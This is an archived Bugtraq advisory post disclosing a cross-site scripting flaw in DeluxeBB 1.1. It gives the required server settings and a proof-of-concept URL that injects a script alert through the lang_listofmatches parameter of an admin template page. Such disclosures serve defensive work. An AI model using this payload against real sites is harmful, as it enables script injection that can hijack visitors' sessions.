[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

DeluxeBB 1.1 XSS Vulnerabilitie

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: DeluxeBB 1.1 XSS Vulnerabilitie
From: nbbn@xxxxxxx
Date: Tue, 22 Jan 2008 18:07:53 +0100

########################################################
#Founded: 21, January 2008                             
#Autor: NBBN                                           
#Type: XSS                                             
#DeluxeBB Version: 1.1                                 
#Register Globals: ON                                  
#Magic Quotes; OFF                                     
########################################################

poc:

http://www.site.tld/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>

Prev by Date: Belong Site Builder 0.1b Bypass Admincp
Next by Date: Re: PR07-38: XSS on sIFR
Previous by thread: Belong Site Builder 0.1b Bypass Admincp
Next by thread: XSRF under Dean’s Permalinks Migration 1.0
Index(es):
- Date
- Thread